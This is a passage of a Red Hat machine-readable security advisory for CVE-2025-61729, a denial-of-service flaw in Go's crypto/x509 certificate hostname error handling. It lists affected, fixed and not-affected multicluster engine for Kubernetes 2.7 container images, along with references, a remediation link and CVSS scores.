"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:23:47+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.12/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5636"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
